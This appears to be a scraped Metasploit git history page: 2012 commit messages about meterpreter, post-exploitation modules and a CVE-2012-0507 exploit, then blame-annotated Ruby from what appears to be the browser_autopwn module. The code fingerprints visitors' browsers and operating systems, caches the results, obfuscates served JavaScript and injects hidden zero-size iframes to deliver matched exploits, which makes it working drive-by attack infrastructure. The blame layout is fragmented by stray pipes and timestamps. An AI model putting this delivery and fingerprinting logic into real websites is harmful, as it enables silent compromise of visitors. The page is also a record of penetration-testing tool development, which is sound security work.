Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
js.obfuscate unless datastore["DEBUG"]
|
2011-05-20 09:11:43 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
response.body = "#{js}"
|
2008-07-22 07:28:05 +00:00
|
|
|
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Responding with #{sploit_cnt} exploits")
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.each do |name|
|
2012-04-11 06:26:25 +00:00
|
|
|
vprint_status("* #{name}")
|
2012-04-05 07:33:07 +00:00
|
|
|
end
|
2008-07-22 07:28:05 +00:00
|
|
|
return response
|
|
|
|
end
|
|
|
|
|
2011-10-17 02:42:01 +00:00
|
|
|
#
|
2011-05-20 09:11:43 +00:00
|
|
|
# Yields each module that exports autopwn_info, filtering on MATCH and EXCLUDE options
|
|
|
|
#
|
|
|
|
def each_autopwn_module(&block)
|
|
|
|
m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{}
|
|
|
|
e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
|
|
|
|
framework.exploits.each_module do |name, mod|
|
|
|
|
if (mod.respond_to?("autopwn_opts") and name =~ m_regex and name !~ e_regex)
|
|
|
|
yield name, mod
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns true if an exploit for +browser+ (one of the +OperatingSystems+
|
|
|
|
# constants) should be sent for a particilar client. +client_info+ should
|
|
|
|
# be something returned by +get_client+.
|
|
|
|
#
|
|
|
|
# If +client_info+ is nil then get_client failed and we have no
|
|
|
|
# knowledge of this client, so we can't assume anything about their
|
|
|
|
# browser. If the exploit does not specify a browser target, that
|
|
|
|
# means it it is generic and will work anywhere (or at least be
|
|
|
|
# able to autodetect). If the currently connected client's ua_name
|
|
|
|
# is nil, then the fingerprinting didn't work for some reason.
|
|
|
|
# Lastly, check to see if the client's browser matches the browser
|
|
|
|
# targetted by this group of exploits. In all of these cases, we
|
|
|
|
# need to send all the exploits in the list.
|
|
|
|
#
|
|
|
|
# In contrast, if we have all of that info and it doesn't match, we
|
|
|
|
# don't need to bother sending it.
|
|
|
|
#
|
|
|
|
def client_matches_browser(client_info, browser)
|
2011-10-17 02:42:01 +00:00
|
|
|
if client_info and browser and client_info[:ua_name]
|
2011-05-20 09:11:43 +00:00
|
|
|
if browser != "generic" and client_info[:ua_name] != browser
|
2012-04-09 07:53:57 +00:00
|
|
|
vprint_status("Rejecting exploits for #{browser}")
|
2011-05-20 09:11:43 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
true
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-07-23 08:26:42 +00:00
|
|
|
# consider abstracting this out to a method (probably
|
2010-10-09 06:55:52 +00:00
|
|
|
# with a different name) of Msf::Auxiliary::Report or
|
|
|
|
# Msf::Exploit::Remote::HttpServer
|
2008-07-22 07:28:05 +00:00
|
|
|
def record_detection(cli, request)
|
|
|
|
os_name = nil
|
|
|
|
os_flavor = nil
|
|
|
|
os_sp = nil
|
|
|
|
os_lang = nil
|
|
|
|
arch = nil
|
|
|
|
ua_name = nil
|
2009-07-22 20:14:35 +00:00
|
|
|
ua_ver = nil
|
2008-07-22 07:28:05 +00:00
|
|
|
|
|
|
|
data_offset = request.uri.index('sessid=')
|
2009-07-23 09:58:13 +00:00
|
|
|
#p request['User-Agent']
|
2010-04-30 08:40:19 +00:00
|
|
|
if (data_offset.nil? or -1 == data_offset)
|
2008-07-22 07:28:05 +00:00
|
|
|
# then we didn't get a report back from our javascript
|
2010-04-30 08:40:19 +00:00
|
|
|
# detection; make a best guess effort from information
|
2008-07-22 07:28:05 +00:00
|
|
|
# in the user agent string. The OS detection should be
|
2009-07-22 20:14:35 +00:00
|
|
|
# roughly the same as the javascript version on non-IE
|
|
|
|
# browsers because it does most everything with
|
|
|
|
# navigator.userAgent
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Recording detection from User-Agent: #{request['User-Agent']}")
|
2009-07-22 20:14:35 +00:00
|
|
|
report_user_agent(cli.peerhost, request)
|
2010-03-24 16:28:04 +00:00
|
|
|
else
|
2008-07-22 07:28:05 +00:00
|
|
|
data_offset += 'sessid='.length
|
|
|
|
detected_version = request.uri[data_offset, request.uri.length]
|
|
|
|
if (0 < detected_version.length)
|
|
|
|
detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version))
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("JavaScript Report: #{detected_version}")
|
2009-07-22 20:14:35 +00:00
|
|
|
(os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
|
2010-01-23 00:17:59 +00:00
|
|
|
|
2010-03-24 16:28:04 +00:00
|
|
|
if framework.db.active
|
2011-04-07 21:59:32 +00:00
|
|
|
note_data = { }
|
|
|
|
note_data[:os_name] = os_name if os_name != "undefined"
|
|
|
|
note_data[:os_flavor] = os_flavor if os_flavor != "undefined"
|
|
|
|
note_data[:os_sp] = os_sp if os_sp != "undefined"
|
|
|
|
note_data[:os_lang] = os_lang if os_lang != "undefined"
|
|
|
|
note_data[:arch] = arch if arch != "undefined"
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Reporting: #{note_data.inspect}")
|
2011-04-07 21:59:32 +00:00
|
|
|
|
2012-04-18 01:49:42 +00:00
|
|
|
# Reporting stuff isn't really essential since we store all
|
|
|
|
# the target information locally. Make sure any exception
|
|
|
|
# raised from the report_* methods doesn't prevent us from
|
|
|
|
# sending exploits. This is really only an issue for
|
|
|
|
# connections from localhost where we end up with
|
|
|
|
# ActiveRecord::RecordInvalid errors because 127.0.0.1 is
|
|
|
|
# blacklisted in the Host validations.
|
|
|
|
begin
|
|
|
|
report_note({
|
|
|
|
:host => cli.peerhost,
|
|
|
|
:type => 'javascript_fingerprint',
|
|
|
|
:data => note_data,
|
|
|
|
:update => :unique_data,
|
|
|
|
})
|
|
|
|
client_info = {
|
|
|
|
:host => cli.peerhost,
|
|
|
|
:ua_string => request['User-Agent'],
|
|
|
|
:ua_name => ua_name,
|
|
|
|
:ua_ver => ua_ver
|
|
|
|
}
|
|
|
|
report_client(client_info)
|
|
|
|
rescue => e
|
|
|
|
elog("Reporting failed: #{e.class} : #{e.message}")
|
|
|
|
end
|
2010-03-24 16:28:04 +00:00
|
|
|
end
|
2008-07-22 07:28:05 +00:00
|
|
|
end
|
2010-03-04 07:37:58 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Always populate the target cache since querying the database is too
|
|
|
|
# slow for real-time.
|
|
|
|
key = cli.peerhost + request['User-Agent']
|
|
|
|
@targetcache ||= {}
|
|
|
|
@targetcache[key] ||= {}
|
|
|
|
@targetcache[key][:updated_at] = Time.now.to_i
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
# Clean the cache
|
2010-03-04 07:37:58 +00:00
|
|
|
rmq = []
|
|
|
|
@targetcache.each_key do |addr|
|
|
|
|
if (Time.now.to_i > @targetcache[addr][:updated_at]+60)
|
|
|
|
rmq.push addr
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2008-07-22 07:28:05 +00:00
|
|
|
end
|
2010-03-04 07:37:58 +00:00
|
|
|
rmq.each {|addr| @targetcache.delete(addr) }
|
|
|
|
|
|
|
|
# Keep the attributes the same as if it were created in
|
|
|
|
# the database.
|
|
|
|
@targetcache[key][:updated_at] = Time.now.to_i
|
|
|
|
@targetcache[key][:ua_string] = request['User-Agent']
|
|
|
|
@targetcache[key][:ua_name] = ua_name
|
|
|
|
@targetcache[key][:ua_ver] = ua_ver
|
2012-04-05 07:33:07 +00:00
|
|
|
|
|
|
|
@targetcache[key][:host] = {}
|
|
|
|
@targetcache[key][:host][:os_name] = os_name
|
|
|
|
@targetcache[key][:host][:os_flavor] = os_flavor
|
|
|
|
@targetcache[key][:host][:os_sp] = os_sp
|
|
|
|
@targetcache[key][:host][:os_lang] = os_lang
|
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
end
|
|
|
|
|
2010-03-04 07:37:58 +00:00
|
|
|
# Override super#get_client to use a cache since the database is generally
|
|
|
|
# too slow to be useful for realtime tasks. This essentially creates an
|
|
|
|
# in-memory database. The upside is that it works if the database is
|
|
|
|
# broken (which seems to be all the time now).
|
2009-12-29 23:48:45 +00:00
|
|
|
def get_client(opts)
|
|
|
|
host = opts[:host]
|
2010-03-04 07:37:58 +00:00
|
|
|
return @targetcache[opts[:host]+opts[:ua_string]]
|
2008-07-01 01:44:56 +00:00
|
|
|
end
|
|
|
|
|
2008-07-22 07:28:05 +00:00
|
|
|
def build_iframe(resource)
|
2008-07-23 08:26:42 +00:00
|
|
|
ret = ''
|
2009-08-06 05:56:24 +00:00
|
|
|
if (action.name == 'DefangedDetection')
|
|
|
|
ret << "<p>iframe #{resource}</p>"
|
|
|
|
else
|
2010-12-15 23:02:04 +00:00
|
|
|
ret << %Q|<iframe src="#{resource}" style="visibility:hidden" height="0" width="0" border="0"></iframe>|
|
|
|
|
#ret << %Q|<iframe src="#{resource}" ></iframe>|
|
2009-08-06 05:56:24 +00:00
|
|
|
end
|
2008-07-23 08:26:42 +00:00
|
|
|
return ret
|
2008-07-22 07:28:05 +00:00
|
|
|
end
|
2008-11-25 08:51:17 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
def exploit_resource(name)
|
|
|
|
if (@exploits[name] && @exploits[name].respond_to?("get_resource"))
|
2010-07-09 23:57:54 +00:00
|
|
|
#print_line("Returning #{@exploits[name].get_resource.inspect}, for #{name}")
|
2009-07-22 20:14:35 +00:00
|
|
|
return @exploits[name].get_resource
|
2008-11-25 08:51:17 +00:00
|
|
|
else
|
2009-07-22 20:14:35 +00:00
|
|
|
print_error("Don't have an exploit by that name, returning 404#{name}.html")
|
|
|
|
return "404#{name}.html"
|
2008-11-25 08:51:17 +00:00
|
|
|
end
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
|
|
|
def js_debug(msg)
|
|
|
|
if datastore['DEBUG']
|
|
|
|
return "document.body.innerHTML += #{msg};"
|
|
|
|
end
|
|
|
|
return ""
|
|
|
|
end
|
2010-03-04 07:37:58 +00:00
|
|
|
|
2010-08-30 22:17:26 +00:00
|
|
|
def cleanup
|
|
|
|
print_status("Cleaning up exploits...")
|
|
|
|
@exploits.each_pair do |name, mod|
|
2011-05-20 09:11:43 +00:00
|
|
|
# if the module died for some reason, we can't kill it
|
|
|
|
next unless mod
|
2010-08-30 22:17:26 +00:00
|
|
|
framework.jobs[mod.job_id.to_s].stop if framework.jobs[mod.job_id.to_s]
|
|
|
|
end
|
|
|
|
@handler_job_ids.each do |id|
|
|
|
|
framework.jobs[id.to_s].stop if framework.jobs[id.to_s]
|
|
|
|
end
|
|
|
|
super
|
|
|
|
end
|
|
|
|
|
2008-11-17 07:53:44 +00:00
|
|
|
end
|